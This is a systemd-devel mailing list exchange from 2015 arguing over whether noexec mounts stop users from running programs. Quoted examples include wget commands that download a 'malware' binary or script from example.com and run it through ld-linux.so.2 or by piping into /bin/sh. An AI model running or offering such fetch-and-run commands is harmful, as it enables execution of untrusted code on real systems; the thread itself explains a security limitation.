Am 16.02.2015 um 21:02 schrieb Mantas Mikulėnas:
On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald wrote:

    Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas:

        On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
        wrote:

             wget http://example.com/malware.____x86.bin
        <http://example.com/malware.__x86.bin>
             <http://example.com/malware.__x86.bin
        <http://example.com/malware.x86.bin>>
             /lib/ld-linux.so.2 malware.x86.bin

        Pretty sure this no longer works; these days noexec prevents
        mmap(PROT_EXEC) as well

    you should not assume when you can try it simple
    [...]
    [root@arrakis:~]$ bash /Volumes/dune/test.sh
    config-3.18.7-100.fc20.x86_64  grub2
    initramfs-3.18.7-100.fc20.x86___64.img  initrd-plymouth.img
    lost+found System.map-3.18.7-100.fc20.__x86_64
    vmlinuz-3.18.7-100.fc20.x86_64

And you should not reply before you read the actual post, in which I
specifically reply to a comment about ld-linux.so – not script
interpreters, which don't rely on this function

the context was about "can you prevent a user from execute something with noexec" and fact is you can't - period

likely you missed the "wget -O - http://example.com/malware.sh | /bin/sh" in the post explaining it.... it's the part you stripped from your quote (maybe not post HTML would have kept it readbale)

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
systemd-devel mailing list
[email protected]
http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Reply via email to